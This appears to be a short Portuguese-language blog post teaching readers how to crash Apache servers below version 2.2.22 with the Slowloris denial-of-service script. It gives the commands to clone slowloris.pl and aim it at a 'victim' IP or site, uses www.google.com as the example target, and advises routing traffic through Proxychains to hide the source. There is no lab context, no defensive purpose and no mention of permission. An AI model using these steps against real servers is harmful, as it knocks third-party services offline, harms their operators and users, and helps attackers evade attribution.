DoS no Apache 2 com Slowloris

DoS no Apache 2 com Slowloris

O Slowloris é uma ferramenta para negação de serviço que atinge servidores Apache com versões inferiores à 2.2.22. Essa vulnerabilidade existe pois o Apache não sabe lidar com muitos sockets e acaba ficando sobrecarregado.

Com apenas uma maquina e poucos minutos, conseguimos derrubar o Apache.

Utilizando o Slowloris.pl

Primeiramente, você precisa ter o Perl instalado em seu computador.

Depois de instalado o Perl, vamos baixar e utilizar o Slowloris.pl.

Abra o terminal e digite:

git clone https://github.com/llaera/slowloris.pl.git

Ainda no terminal, acesse a pasta do Slowloris e utilize o script digitando:

perl slowloris.pl -dns IP OU SITE DA VÍTIMA

Exemplo:

perl slowloris.pl -dns www.google.com

Essa ferramenta gera muito tráfego, então é aconselhável utilizar um proxy, de uma olhada no artigo que fiz sobre o Proxychains.

Espero que tenha gostado, qualquer dúvida estou a disposição 😀

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *